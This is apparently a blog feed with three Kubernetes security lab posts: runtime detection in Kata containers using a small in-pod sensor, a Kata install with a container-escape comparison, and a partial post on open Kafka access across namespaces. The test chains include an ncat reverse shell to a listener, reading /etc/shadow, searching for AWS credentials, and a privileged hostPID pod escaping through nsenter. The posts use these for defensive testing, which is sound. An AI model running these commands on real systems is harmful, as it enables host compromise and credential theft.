CloudSecBurrito

Runtime Security in Kata: Less Visibility, Better Signal

Matt Brown — Thu, 02 Apr 2026 02:18:12 GMT

Kata containers give you a stronger boundary. That is the point.

But that boundary also breaks a lot of the assumptions we rely on for runtime security. The usual model works because containers share a kernel. You get visibility from the host, you stream syscalls, and you build detections on top of that.

Kata changes that.

Now there is a guest kernel in the way, and “just look at the host” stops being enough. At some point, adding more host-level telemetry does not help. You are just looking harder from the wrong side of the wall.

So instead of trying to force the usual model to fit, I went in the other direction: figure out what actually matters inside the workload and build around that.

This post does two things:

Show the normal runtime-security model with a quick Falco sanity check in a standard container and then in Kata.
Show why the answer in Kata is not “get every syscall back,” but “collect the right signals from inside the workload boundary.”

Diagrams

What you would need if you insisted on the old model

This is the awkward reality in Kata. The workload sits behind a guest kernel, so host Falco is no longer observing the workload the same way it would in a shared-kernel container runtime. If you want syscall-centric visibility all the way through, you start drifting toward a two-layer model: one perspective in the guest, one on the host, and a lot more complexity than “just deploy Falco.”

The model we actually care about

This is the practical model. Keep the host boundary intact. Do not try to recreate a full runtime platform inside the guest. Put a small agent next to the workload, capture a handful of high-signal behaviors, and ship them somewhere useful.

Quick reset: what actually changed

In a normal Kubernetes setup:

containers share the host kernel
syscalls are visible from the host
runtime detection lives comfortably at that layer

That is why tools like Falco work so well in standard container environments. The observation point matches the workload.

With Kata:

each pod runs inside its own lightweight VM
syscalls terminate inside the guest kernel
the host sees less, and sometimes sees it differently

The important part is not just “less visibility.” It is that the observation point moved. A Kata pod is not just a more isolated container. It is a workload running behind its own kernel boundary. That means host-level runtime tooling is no longer standing in the same place relative to the process you care about.

Lightning baseline: Falco on a normal container

Before arguing with the model, it is worth doing the easy sanity check.

Fast deploy

Quick and dirty Falco deploy.

helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update

helm upgrade --install falco falcosecurity/falco \
  -n falco \
  --create-namespace \
  --set falcosidekick.enabled=true \
  --set falcosidekick.webui.enabled=true

That is enough for a quick lab check. No giant tuning exercise. No twenty-page values file. Just get Falco running and confirm the standard model still behaves like the standard model.

Test workload

A plain container is enough:

apiVersion: v1
kind: Pod
metadata:
  name: normal-app
  namespace: default
  labels:
    app: normal-app
spec:
  restartPolicy: Never
  containers:
    - name: app
      image: debian:stable-slim
      command: ["/bin/sh", "-c"]
      args:
        - |
          apt-get update && apt-get install -y procps findutils && \
          sleep 3600

Apply it:

kubectl apply -f normal-pod.yaml

A singular attack worth testing

For this comparison, let’s not just “spawn a shell.” Let’s try a sequence of events:

exec in
read sensitive file
browse for aws creds
install ncat
spawn reverse shell

That gives you a decent mini attack chain.

Example:

kubectl exec -it normal-app -- /bin/bash

# inside the container
cat /etc/shadow
find / -iname ".aws/credentials" 2>/dev/null
apt install ncat -y
ncat --exec /bin/sh 10.244.0.1 4444 #run nc -lvnp 4444 from attacker machine

What you expect to see

In a standard container runtime, Falco is in its natural habitat. Assuming Falco defaults, you should see signal around sensitive file access, finding aws creds, dropping a new binary, and launching a reverse shell. While this could vary a bit, the main point is simple:

in a shared-kernel container, host-level syscall monitoring lines up with the workload you are testing

No mystery. No special pleading. The baseline works. As we can see in this snippet from Falco Sidekick.

Run the same thing in Kata

Now take basically the same pod and move it to Kata:

apiVersion: v1
kind: Pod
metadata:
  name: kata-app
  namespace: default
  labels:
    app: kata-app
spec:
  runtimeClassName: kata-qemu
  restartPolicy: Never
  containers:
    - name: app
      image: debian:stable-slim
      command: ["/bin/sh", "-c"]
      args:
        - |
          apt-get update && apt-get install -y netcat-openbsd procps findutils && \
          sleep 3600

Apply it:

kubectl apply -f kata-pod.yaml

Then run the same sequence:

kubectl exec -it kata-app -- /bin/bash

# inside the container
cat /etc/shadow
find / -iname ".aws/credentials" 2>/dev/null
apt install ncat -y
ncat --exec /bin/sh 10.244.0.1 4444 #run nc -lvnp 4444 from attacker machine

And you'll see nothing. The workload is now behind a guest kernel. That means the host Falco sensor is no longer seeing the same direct syscall stream it gets in a normal container model.

But here is the point.

This is not a Falco failure, and it is not a Kata bug. This is the boundary doing its job.

Kata is supposed to change the isolation model. If the runtime boundary changes, the detection model has to change with it.

Why I am not going to put Falco inside Kata

This is where the line starts to matter. Could you try to push harder on syscall-centric detection inside Kata? Sure.

You could put Falco into the container. But I don't think the juice is worth the squeeze.

I am not working with a giant production fleet here. This is a sandboxed workload, not a sea of hundreds of ordinary containers. I do not have the luxury of just collecting everything and tuning it forever. And more importantly, Kata is not trying to be “regular containers, but a little stronger.” It is a different boundary with different tradeoffs.

So my question changes too.

Instead of asking:

how do I get all my syscalls back?
how do I make Falco see everything it used to see?

I am asking:

what do I actually need to observe, from inside this workload, to know something meaningful is happening?

That leads to a much smaller and much more defensible list:

shell execution
recon behavior
installing new binaries
reverse shell
suspicious outbound connections
process chains that look like an attack rather than normal app behavior

That is the design center for the micro-agent. Just enough signal, from the right side of the boundary, to tell me when a sandboxed workload starts acting like an attacker lives there now.

The micro-agent: less visibility, actual signal

The micro-agent is deliberately simple:

it runs as a sidecar inside the Kata pod
it polls /proc for running processes
it applies a small set of rules focused on high-signal behavior
it ships events to a lightweight receiver with a UI

That’s it. No kernel hooks. No syscall stream. No attempt to reconstruct the host view. Instead, it answers a narrower question:

what is this workload actually doing right now?

What it looks for

The detection model maps directly to the behaviors I actually care about:

shell execution inside the workload
access to sensitive files (/etc/shadow)
credential discovery (.aws/credentials)
package manager usage (apt-get install, apk add, etc.)
execution of newly introduced binaries
network utilities used for remote execution (ncat --exec, nc -e)

This is not exhaustive. It is intentionally selective. Each rule is simple:

match a process name
optionally match a command-line pattern
emit a structured event

For example:

cat /etc/shadow → shadow_file_access
apt-get install -y ncat → package_manager_execution
ncat --exec /bin/sh ... → nc_execution

No magic. Just picking signals that actually mean something.

Approximating “drop and execute”

Falco can tell you that a binary came from the container’s writable layer. Inside the workload, I do not have that context. No overlayfs view. No runtime metadata.

So I approximate it:

build a baseline of executable paths when the container starts
watch for new processes
if a process executes a binary that was not present at startup, flag it

That becomes:

post_start_binary_execution

It is not perfect. It does not know why the binary is new. But it captures what matters:

something showed up after startup, and now it is running

Running the same attack chain

So now I run the same Kata app, but with the sensor.

apiVersion: v1
kind: Pod
metadata:
  name: kata-app
  namespace: kata-demo
  labels:
    app: kata-app
spec:
  runtimeClassName: kata-qemu
  shareProcessNamespace: true
  restartPolicy: Never
  containers:
    - name: app
      image: debian:stable-slim
      imagePullPolicy: Always
      command: ["/bin/sh", "-c"]
      args:
        - |
          sleep 3600

    - name: sensor
      image: sfmatt/kata-sensor:latest
      imagePullPolicy: Always
      env:
        - name: RECEIVER_URL
          value: "http://kata-receiver.kata-demo.svc.cluster.local/events"
        - name: POLL_INTERVAL
          value: "2"
        - name: HEARTBEAT_INTERVAL
          value: "15"
        - name: MODE
          value: "kata"
        - name: EXPECTED_PROCESSES
          value: "sleep"
        - name: POD_NAME
          valueFrom:
            fieldRef:
              fieldPath: metadata.name
        - name: POD_NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace

And I run the receiver (poor man's Falco Sidekick) as well.

apiVersion: v1
kind: Namespace
metadata:
  name: kata-demo
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: kata-receiver
  namespace: kata-demo
spec:
  replicas: 1
  selector:
    matchLabels:
      app: kata-receiver
  template:
    metadata:
      labels:
        app: kata-receiver
    spec:
      containers:
        - name: receiver
          image: sfmatt/kata-receiver:latest
          imagePullPolicy: Always
          ports:
            - containerPort: 8080
---
apiVersion: v1
kind: Service
metadata:
  name: kata-receiver
  namespace: kata-demo
spec:
  type: NodePort
  selector:
    app: kata-receiver
  ports:
    - name: http
      port: 80       
      targetPort: 8080  
      nodePort: 30080

Apply these. With the sensor pod and receiver running, I execute the same sequence inside the container:

kubectl exec -it -n kata-demo kata-app -- /bin/bash

# inside the container
tail -f /etc/shadow
sh -c 'while true; do find / -path "*/.aws/credentials" 2>/dev/null; sleep 1; done'
apt update && apt install ncat -y
ncat --exec /bin/sh 10.244.0.1 4444 # run nc -lvnp 4444 from attacker machine

And the output is exactly what I need:

unexpected_shell
shadow_file_access
aws_credential_discovery
package_manager_execution
post_start_binary_execution
nc_execution

That’s the whole story. No massive ruleset. Six events. This is not about replacing Falco. It is about proving a different point:

inside a sandboxed workload, you can still get meaningful runtime signal without rebuilding full system visibility

The signal is smaller. The implementation is simpler. But the outcome is still useful.

Perfect is the enemy of the good

There are obvious gaps:

this is polling-based
fast, short-lived processes can be missed
there is no kernel-level visibility
“new binary” detection is a heuristic, not ground truth
this hasn’t been hardened or security tested

But those tradeoffs are intentional. I’m not trying to rebuild the host from inside the guest. I’m trying to answer a simpler question:

does this workload look like it just got compromised?

And for this scenario, six signals is enough to answer that with confidence.

Wrapup

This is a starting point, not an endpoint. Zooming out:

what is the minimal detection model that actually works across sandboxed runtimes?
which signals survive isolation boundaries consistently?
how do you combine admission + runtime + workload-local context into something coherent?

I don’t think the answer is “just run Falco inside the guest.” This isn’t about seeing everything. It’s about seeing enough. Kata changes the boundary, so the detection model has to change too. And once you accept that, the problem gets smaller.

It’s a bit like watching your kid in a sandbox. You’re not responsible for the whole park, the playground, and every other kid running around. You’re focused on a small, defined space. If something weird happens in that sandbox, you’ll notice.

From experience, that’s a much more manageable problem.

And inside a sandboxed workload, that’s really the point. You don’t need global visibility. You need confidence that the thing in front of you isn’t starting to behave like something it shouldn’t.

Kata Containers: When "Container Escape" Stops Working

Matt Brown — Wed, 25 Mar 2026 20:01:25 GMT

I wanted to try Kata Containers. Not in a "read the docs and feel informed" way, but in a burrito way. Which of course means: run it, break it, and see what actually changes.

Because on paper, Kata sounds like the answer to a question we've mostly hand-waved: what if containers weren't just sharing the same kernel and hoping for the best?

So I did what I always do. I spun up…Spun up a quick Kubernetes lab, installed the runtime, applied a RuntimeClass, and waited for my pod to come up. It didn't. It just sat there. ContainerCreating. Mocking me. No obvious misconfig, no broken YAML, just enough of an error to suggest something deeper was wrong and not enough to tell me what.

After a bit of digging, the problem became clear: I wasn't missing configuration. I was missing a hypervisor. More specifically, I was trying to run VM-backed containers on infrastructure that had absolutely no intention of letting me run a VM inside it. My local lab VM? Not a chance. Apple Silicon says no.

So instead of fighting the environment, I changed it. I spun up a GCP instance with nested virtualization enabled and tried again. Same Kubernetes setup. Same RuntimeClass. Completely different result.

And that's when things finally started to work. But getting Kata running turned out to be the easy part. Understanding what it actually changes, especially for container security, is where things get interesting.

Diagram

This diagram shows the key difference between standard containers and Kata. In a normal setup, containers share the host kernel, which is why escapes can reach the node. With Kata, the workload runs inside a microVM with its own guest kernel, backed by KVM. The result is simple: the isolation boundary moves. Instead of going straight to the host, an escape attempt hits the VM boundary first.

Kata Containers Local Lab Failure

I started by installing Kata directly into my Kubernetes lab using the official Helm chart. On the surface, everything looked fine.

The chart installed cleanly:

export VERSION=$(curl -sSL https://api.github.com/repos/kata-containers/kata-containers/releases/latest | jq .tag_name | tr -d '"')
export CHART="oci://ghcr.io/kata-containers/kata-deploy-charts/kata-deploy"
helm install kata-deploy "\({CHART}" --version "\){VERSION}"

A kata-deploy DaemonSet showed up, and RuntimeClasses were created:

matt@ciliumcontrolplane:~$ kubectl get runtimeclass
NAME                            HANDLER                         AGE
kata-clh                        kata-clh                        37s
kata-cloud-hypervisor           kata-cloud-hypervisor           37s
kata-dragonball                 kata-dragonball                 37s
kata-fc                         kata-fc                         37s
...

At this point, it looked like Kata was ready to go.

Failure 1: kata-deploy installer issues

The kata-deploy pod was not actually completing successfully. Its logs showed:

[2026-03-19T23:05:55Z INFO  kata_deploy::artifacts::install] Generating drop-in configuration files for shim: clh
[2026-03-19T23:05:55Z INFO  kata_deploy::artifacts::install] Setting up runtime directory for shim: cloud-hypervisor
Error: Configuration file not found: "/host/opt/kata/share/defaults/kata-containers/runtime-rs/runtimes/cloud-hypervisor/configuration-cloud-hypervisor.toml". This file should have been symlinked from the original config. Check that the shim 'cloud-hypervisor' has a valid configuration file in the artifacts.

The installer was attempting to configure multiple hypervisor shims, including cloud-hypervisor, but the expected configuration artifacts were not present. This meant the node was never fully prepared for Kata, even though Kubernetes objects like RuntimeClass were already created.

The fix is to stop trying to install everything and just enable a single, known-good shim. Create a Helm override file (kata-override.yaml):

shims:
  disableAll: true
  qemu:
    enabled: true
defaultShim:
  amd64: qemu
  arm64: qemu

Then reinstall the chart with the override:

helm uninstall kata-deploy

helm install kata-deploy "${CHART}" \
  --version "${VERSION}" \
  -f kata-override.yaml

Voilà! Now the installer skips the problematic shims, completes cleanly, and you finally have a usable kata-qemu runtime.

So now let's deploy a simple test pod using our kata-qemu runtime class:

apiVersion: v1
kind: Pod
metadata:
  name: kata-test
spec:
  runtimeClassName: kata-qemu
  containers:
    - name: nginx
      image: nginx:stable

Kubernetes accepted the pod and attempted to start it. The pod moved into ContainerCreating, which meant:

Scheduling worked
The RuntimeClass was recognized
Kubernetes handed execution off to the runtime layer

Then it failed.

Failure 2: RuntimeClass exists, but runtime does not

Despite the installer issues, the RuntimeClass still existed. This created a false sense that everything was configured correctly.

When the pod attempted to start, containerd produced the real error:

  Warning  FailedCreatePodSandBox  7s (x10 over 2m7s)  kubelet            Failed to create pod sandbox: rpc error: code = Unknown desc = failed to create containerd task: failed to create shim task: Could not create the sandbox resource controller failed to add any hypervisor device to devices cgroup: unknown

At this point, the problem finally became clear. Kubernetes had done its job. The RuntimeClass was valid. The scheduler placed the pod. Kata even got far enough to try launching the sandbox. But when it came time to actually create the VM-backed workload, the runtime had nothing to attach.

There was no usable hypervisor device. No /dev/kvm. No hardware-backed virtualization exposed to the node. Just a container runtime being asked to spin up a VM on infrastructure that fundamentally couldn’t support it.

And that’s a real requirement for Kata. Not just Kubernetes. Not just containerd. Actual access to virtualization through KVM.

GCP Fix

Getting Kata to actually run came down to one thing: giving it a real hypervisor.

I landed on GCP for this. Not because I suddenly became a GCP fan, but because it’s relatively straightforward, reasonably priced, and doesn’t fight you too much when you ask for nested virtualization. More importantly, it’s easy to spin up and tear down with Terraform, which makes the whole experiment repeatable instead of a one-off science project.

The setup itself is not complicated, but it is very particular. You need a machine that actually supports virtualization features. I used a n2-standard-4 with an Intel Cascade Lake CPU and Ubuntu, which is enough for a small lab.

The important part is enabling nested virtualization. Without that, you’re back to the same failure mode as local: everything looks fine, Kubernetes objects exist, but nothing actually works because there’s no hypervisor underneath.

Once nested virtualization is enabled, you finally have what Kata has been quietly asking for the entire time: the ability to run a VM inside your node. At that point, the rest of the setup starts behaving the way the docs promised.

Reproducing the Lab on GCP

Here is the Terraform I used to set the infra up: https://github.com/sf-matt/theburrito/tree/main/kata-gcp-k8s-lab. This gets you a small but workable lab with the things Kata actually cares about:

nested virtualization enabled
Intel Haswell minimum CPU platform
Ubuntu 22.04
Kubernetes installed at boot
Helm installed at boot

Once the instance is up and you can SSH in, I chose to use the SSH-in-browser, but pick your poison.

Set up kubectl

Just do the basics.

mkdir -p $HOME/.kube
sudo cp /etc/kubernetes/admin.conf $HOME/.kube/config
sudo chown \((id -u):\)(id -g) $HOME/.kube/config

Validate the node

Check a few things:

Health of node
Presence of /dev/kvm
Health of pods

matt@kata-k8s-node:~$ kubectl get nodes
NAME            STATUS   ROLES           AGE   VERSION
kata-k8s-node   Ready    control-plane   10m   v1.32.13
matt@kata-k8s-node:~$ ls /dev/kvm 
/dev/kvm
matt@kata-k8s-node:~$ kubectl get po -A
NAMESPACE      NAME                                    READY   STATUS    RESTARTS   AGE
kube-flannel   kube-flannel-ds-wvchr                   1/1     Running   0          11m
kube-system    coredns-668d6bf9bc-2xllc                1/1     Running   0          11m
kube-system    coredns-668d6bf9bc-9vgrm                1/1     Running   0          11m
kube-system    etcd-kata-k8s-node                      1/1     Running   0          11m
kube-system    kube-apiserver-kata-k8s-node            1/1     Running   0          11m
kube-system    kube-controller-manager-kata-k8s-node   1/1     Running   0          11m
kube-system    kube-proxy-4j4sc                        1/1     Running   0          11m
kube-system    kube-scheduler-kata-k8s-node            1/1     Running   0          11m

Assuming this looks good, you can proceed to setting up Kata.

Install Kata

First we set the variables.

export VERSION=$(curl -sSL https://api.github.com/repos/kata-containers/kata-containers/releases/latest | jq .tag_name | tr -d '"')
export CHART="oci://ghcr.io/kata-containers/kata-deploy-charts/kata-deploy"

Then just use Helm to install it.

helm install kata-deploy "\({CHART}" --version "\){VERSION}"

Check runtime classes. There will be a lot.

matt@kata-k8s-node:~$ kubectl get runtimeclass
NAME                            HANDLER                         AGE
kata-clh                        kata-clh                        105s
kata-cloud-hypervisor           kata-cloud-hypervisor           105s
kata-dragonball                 kata-dragonball                 105s
kata-fc                         kata-fc                         105s
kata-qemu                       kata-qemu                       105s
kata-qemu-cca                   kata-qemu-cca                   105s
kata-qemu-coco-dev              kata-qemu-coco-dev              105s
kata-qemu-coco-dev-runtime-rs   kata-qemu-coco-dev-runtime-rs   105s
kata-qemu-nvidia-gpu            kata-qemu-nvidia-gpu            105s
kata-qemu-nvidia-gpu-snp        kata-qemu-nvidia-gpu-snp        105s
kata-qemu-nvidia-gpu-tdx        kata-qemu-nvidia-gpu-tdx        105s
kata-qemu-runtime-rs            kata-qemu-runtime-rs            105s
kata-qemu-se                    kata-qemu-se                    105s
kata-qemu-se-runtime-rs         kata-qemu-se-runtime-rs         105s
kata-qemu-snp                   kata-qemu-snp                   105s
kata-qemu-snp-runtime-rs        kata-qemu-snp-runtime-rs        105s
kata-qemu-tdx                   kata-qemu-tdx                   105s
kata-qemu-tdx-runtime-rs        kata-qemu-tdx-runtime-rs        105s

Test Isolation

Now on to the obligatory Netshoot container escape test. This was previously used to test Talos and how the OS surface was greatly reduced. But of course with Kata we can eliminate even that concern.

The deployments below are both non-Kata and Kata container. Save it as escape.yaml. I've chosen kata-qemu in this case.

apiVersion: apps/v1
kind: Deployment
metadata:
  name: normal-escape
spec:
  replicas: 1
  selector:
    matchLabels:
      app: normal-escape
  template:
    metadata:
      labels:
        app: normal-escape
        mode: normal
    spec:
      hostPID: true
      containers:
        - name: escape
          image: nicolaka/netshoot:latest
          command: ["sleep", "3600"]
          securityContext:
            privileged: true
          volumeMounts:
            - name: host-root
              mountPath: /host
      volumes:
        - name: host-root
          hostPath:
            path: /
            type: Directory
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: kata-escape
spec:
  replicas: 1
  selector:
    matchLabels:
      app: kata-escape
  template:
    metadata:
      labels:
        app: kata-escape
        mode: kata
    spec:
      runtimeClassName: kata-qemu
      hostPID: true
      containers:
        - name: escape
          image: nicolaka/netshoot:latest
          command: ["sleep", "3600"]
          securityContext:
            privileged: true
          volumeMounts:
            - name: host-root
              mountPath: /host
      volumes:
        - name: host-root
          hostPath:
            path: /
            type: Directory

Apply:

kubectl apply -f escape.yaml

Let's Escape

Let's grab the pods for easy exec access.

NORMAL_POD=$(kubectl get pod -l app=normal-escape -o jsonpath='{.items[0].metadata.name}')
KATA_POD=$(kubectl get pod -l app=kata-escape -o jsonpath='{.items[0].metadata.name}')

Then run the escape on normal pod.

matt@kata-k8s-node:~\( kubectl exec -it \)NORMAL_POD -- /bin/bash
normal-escape-746ccd6646-jqssr:~# uname -a
Linux normal-escape-746ccd6646-jqssr 6.8.0-1048-gcp #51~22.04.1-Ubuntu SMP Wed Feb 11 02:58:49 UTC 2026 x86_64 Linux
normal-escape-746ccd6646-jqssr:~# nsenter --target 1 --mount --uts --ipc --net --pid
# uname -a 
Linux kata-k8s-node 6.8.0-1048-gcp #51~22.04.1-Ubuntu SMP Wed Feb 11 02:58:49 UTC 2026 x86_64 x86_64 x86_64 GNU/Linux

Cool that was easy. Now on to Kata. Same exact sequence.

matt@kata-k8s-node:~\( kubectl exec -it \)KATA_POD -- /bin/bash
kata-escape-594b89bd47-tt95r:~# uname -a
Linux kata-escape-594b89bd47-tt95r 6.18.15 #1 SMP Tue Mar 17 01:39:00 UTC 2026 x86_64 Linux
kata-escape-594b89bd47-tt95r:~# nsenter --target 1 --mount --uts --ipc --net --pid
nsenter: failed to execute /bin/sh: No such file or directory

The same namespace escape that worked in a standard container failed in the Kata-backed pod. Not because the command was wrong, but because the target was no longer the host. It was the init process inside a VM. The escape attempt never reached the node.

Wrap Up

Kata Containers are not complicated. Containers run inside a VM instead of directly on the host kernel. That’s the whole idea.

What can be complicated is everything around it. Getting the right infrastructure. Figuring out why things fail silently. Realizing that Kubernetes will happily accept your configuration even when the underlying runtime has no chance of working. Once you get past that, the behavior is very straightforward.

A normal container shares the host kernel. A privileged workload can pivot into host namespaces and, in the right conditions, reach the node.

A Kata-backed container does not. It runs with its own kernel inside a VM. The same escape attempt stops at that boundary. You are no longer one mistake away from the host.

This is not magic. It is just a shift in where the isolation boundary lives. Whether that tradeoff is worth it depends on your environment. If you are running untrusted workloads, multi-tenant systems, or anything where a container escape actually matters, it starts to look a lot more reasonable.

If nothing else, it is worth running this yourself. Not reading the docs. Not trusting a diagram. Actually running it and seeing what changes. Because once you see it fail in one runtime and stop in another, the difference is no longer theoretical.

This was a light look at Kata containers and isolation. Not to fear, more to come.

Kafka on Kubernetes

Matt Brown — Mon, 16 Mar 2026 21:06:30 GMT

Kafka is often treated as background infrastructure. It quietly moves events between services like payments, analytics, notifications, etc. So it easy to view it as internal plumbing.

But Kafka is not just another service on the network.

If a workload can reach a Kafka broker, it may be able to read historical messages across entire topics. Those topics often contain operational data, user identifiers, or financial events that were never meant to be broadly accessible. The tricky part is that nothing breaks when this happens. Confidentiality failures in Kafka are usually silent. The system keeps running normally while data quietly flows somewhere it should not.

In Kubernetes environments this often starts with networking. By default, pods can communicate freely across namespaces, which means a compromised or misconfigured service may be able to connect to Kafka and consume data it was never meant to see.

In this post we will deploy a simple Kafka cluster with Strimzi, show how an unintended workload can read sensitive events, and then use networkPolicyPeers and Cilium network policy to enforce the architecture the platform actually intended. The goal is simple. Turn this:

Any pod that can reach Kafka can read Kafka

into this:

Only the workloads that should talk to Kafka can reach Kafka

If you are not familiar with Kafka, it helps to think of it as a distributed event log that services use to publish and consume messages. Producers write events to topics, and consumers read those events to process work or trigger downstream actions. If that model is new to you, it is worth taking a few minutes to read a quick Kafka introduction before continuing. Or what this cool video from Confluent.

Orientation Diagram

Keep this diagram in mind.

The architecture is straightforward. payments-api submits payment commands, payments-worker processes them, and Kafka moves the events between services. Workloads outside that flow should not be interacting with Kafka at all.

In theory that separation seems obvious, but Kubernetes does not enforce it by default. If a pod can reach Kafka, it can usually talk to it. The rest of this post walks through that behavior and then shows how NetworkPolicy can enforce the boundaries the platform actually intended.

The Architecture We Think We Built

For this example we will model a simple event-driven payments system. Kafka runs in a dedicated namespace called platform-data. Application workloads live in their own namespaces and communicate with Kafka to produce or consume events.

Two services exist in the payments namespace:

payments-api Internet-facing service that receives payment requests. Its only responsibility is to produce messages to the payments.commands topic.
payments-worker Internal service that processes those commands and produces results to payments.events.

The system also contains an unrelated namespace:

analytics Batch jobs and internal tooling that should not interact with the payments pipeline at all.

The Kafka topics look like this:

payments.commands
payments.events

The intended architecture is straightforward.

payments-api      → produce → payments.commands
payments-worker   → consume → payments.commands
payments-worker   → produce → payments.events
analytics         → no Kafka access

In other words, the API tier can submit payment requests, the worker tier processes them, and the resulting events are published for downstream consumers. Under this model, the payments.events topic may contain sensitive operational data such as payment identifiers, customer references, or transaction outcomes. Only trusted internal services should be able to read from it.

The assumption many teams make is that Kubernetes namespaces and service boundaries already enforce this separation.

Baseline Deployment

To understand the problem, we will first deploy the architecture from the previous diagram. This section sets up a Kafka cluster, creates the payment topics, and deploys the example workloads. No network policy is applied yet.

The goal is simply to establish a working environment before we test how workloads interact with Kafka.

Create Namespaces

kubectl create ns platform-data
kubectl create ns payments
kubectl create ns analytics

platform-data will host Kafka, while application workloads live in their own namespaces.

Install the Strimzi Operator

matt@ciliumcontrolplane:~/kafka$ kubectl apply -f 'https://strimzi.io/install/latest?namespace=platform-data' -n platform-data
clusterrole.rbac.authorization.k8s.io/strimzi-cluster-operator-leader-election created
deployment.apps/strimzi-cluster-operator created
customresourcedefinition.apiextensions.k8s.io/kafkanodepools.kafka.strimzi.io unchanged
clusterrole.rbac.authorization.k8s.io/strimzi-cluster-operator-global created
...

Strimzi manages the lifecycle of the Kafka cluster inside Kubernetes.

Deploy Kafka

Save the following as kafka.yaml.

apiVersion: kafka.strimzi.io/v1
kind: KafkaNodePool
metadata:
  name: demo-pool
  namespace: platform-data
  labels:
    strimzi.io/cluster: demo
spec:
  replicas: 3
  roles:
    - controller
    - broker
  storage:
    type: ephemeral
---
apiVersion: kafka.strimzi.io/v1
kind: Kafka
metadata:
  name: demo
  namespace: platform-data
spec:
  kafka:
    version: 4.1.1
    listeners:
      - name: plain
        port: 9092
        type: internal
        tls: false
    config:
      default.replication.factor: 3
      min.insync.replicas: 2
      offsets.topic.replication.factor: 3
      transaction.state.log.replication.factor: 3
      transaction.state.log.min.isr: 2
      inter.broker.protocol.version: "4.1"

This manifest deploys a small Kafka cluster using Strimzi. The KafkaNodePool defines three nodes that act as both controllers and brokers, which is enough to run a functional cluster for testing. Storage is configured as ephemeral since the goal of this environment is just demonstration.

The Kafka resource configures the broker itself. It exposes an internal listener on port 9092, disables TLS for simplicity, and sets the replication settings so topics can be replicated across the three brokers.

In short, this creates a minimal but fully functional Kafka cluster that other workloads in the cluster can connect to through the demo-kafka-bootstrap service.

matt@ciliumcontrolplane:~/kafka$ kubectl apply -f kafka.yaml
kafkanodepool.kafka.strimzi.io/demo-pool created
kafka.kafka.strimzi.io/demo created

Verify the Kafka services:

kubectl get svc -n platform-data | grep demo-kafka

Create Kafka Topics

Launch a temporary Kafka CLI pod:

kubectl -n payments run kafka-toolbox   --image=quay.io/strimzi/kafka:0.40.0-kafka-3.7.0   --restart=Never   -- sleep 1d

This creates a temporary pod containing the Kafka CLI tools. The pod runs sleep 1d so it stays alive long enough for us to execute commands inside it with kubectl exec. We will use it to create topics and interact with the Kafka cluster from inside Kubernetes.

Create the topics used by the payments system. Kafka prints a warning about topic names containing . or _. This does not affect the topic itself. The topic is created successfully and can be used normally.

kubectl -n payments exec -it kafka-toolbox -- /opt/kafka/bin/kafka-topics.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --create --topic payments.commands --partitions 3 --replication-factor 3

kubectl -n payments exec -it kafka-toolbox -- /opt/kafka/bin/kafka-topics.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --create --topic payments.events --partitions 3 --replication-factor 3

These commands create the two topics used by the payment system. payments.commands will carry incoming payment requests, while payments.events will contain the resulting payment outcomes. Each topic is created with three partitions and a replication factor of three so the data is distributed across the Kafka brokers.

Deploy the Example Workloads

Create two simple pods representing the application services.

payments-api

kubectl -n payments run payments-api   --labels app=payments-api   --image=quay.io/strimzi/kafka:0.40.0-kafka-3.7.0   --restart=Never   -- sleep 1d

payments-worker

kubectl -n payments run payments-worker   --labels app=payments-worker   --image=quay.io/strimzi/kafka:0.40.0-kafka-3.7.0   --restart=Never   -- sleep 1d

These pods simply provide access to the Kafka CLI tools so we can simulate application behavior.

Testing Kafka Access

Now that the environment is deployed, we can test how workloads interact with Kafka.

Generate Payment Events

From the worker pod:

kubectl -n payments exec -it payments-worker -- bash -lc 'for i in {1..5}; do echo "{\"payment_id\":\"p-\(i\",\"status\":\"APPROVED\",\"customer\":\"cust-\)i\",\"amount\":$((i*10))}" done | /opt/kafka/bin/kafka-console-producer.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --topic payments.events'

This command generates a few sample payment events and sends them to the payments.events topic using the Kafka console producer.

Intended Read

The worker should be able to read the events it produces.

matt@ciliumcontrolplane:~/kafka$ kubectl -n payments exec -it payments-worker -- /opt/kafka/bin/kafka-console-consumer.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --topic payments.events --from-beginning --timeout-ms 8000
{"payment_id":"p-1","status":"APPROVED","customer":"cust-1","amount":10}
{"payment_id":"p-2","status":"APPROVED","customer":"cust-2","amount":20}
{"payment_id":"p-3","status":"APPROVED","customer":"cust-3","amount":30}
{"payment_id":"p-4","status":"APPROVED","customer":"cust-4","amount":40}
{"payment_id":"p-5","status":"APPROVED","customer":"cust-5","amount":50}
Processed a total of 5 messages

This succeeds as expected.

Unintended Read

Now run the same command from payments-api.

matt@ciliumcontrolplane:~/kafka$ kubectl -n payments exec -it payments-api -- /opt/kafka/bin/kafka-console-consumer.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --topic payments.events --from-beginning --timeout-ms 8000
{"payment_id":"p-1","status":"APPROVED","customer":"cust-1","amount":10}
{"payment_id":"p-2","status":"APPROVED","customer":"cust-2","amount":20}
{"payment_id":"p-3","status":"APPROVED","customer":"cust-3","amount":30}
{"payment_id":"p-4","status":"APPROVED","customer":"cust-4","amount":40}
{"payment_id":"p-5","status":"APPROVED","customer":"cust-5","amount":50}
Processed a total of 5 messages

This works because nothing in the cluster currently limits which pods can reach Kafka. The payments-api pod can connect to the same broker service as payments-worker, and Kafka does not distinguish between them in this demo. As long as a pod can reach the broker, it can consume the topic.

Cross Namespace Access

Even unrelated workloads can reach Kafka.

kubectl -n analytics run analytics-random   --image=quay.io/strimzi/kafka:0.40.0-kafka-3.7.0   --restart=Never   -- sleep 1d

Then consume events:

matt@ciliumcontrolplane:~/kafka$ kubectl -n analytics exec -it analytics-random -- /opt/kafka/bin/kafka-console-consumer.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --topic payments.events --from-beginning --timeout-ms 8000
{"payment_id":"p-1","status":"APPROVED","customer":"cust-1","amount":10}
{"payment_id":"p-2","status":"APPROVED","customer":"cust-2","amount":20}
{"payment_id":"p-3","status":"APPROVED","customer":"cust-3","amount":30}
{"payment_id":"p-4","status":"APPROVED","customer":"cust-4","amount":40}
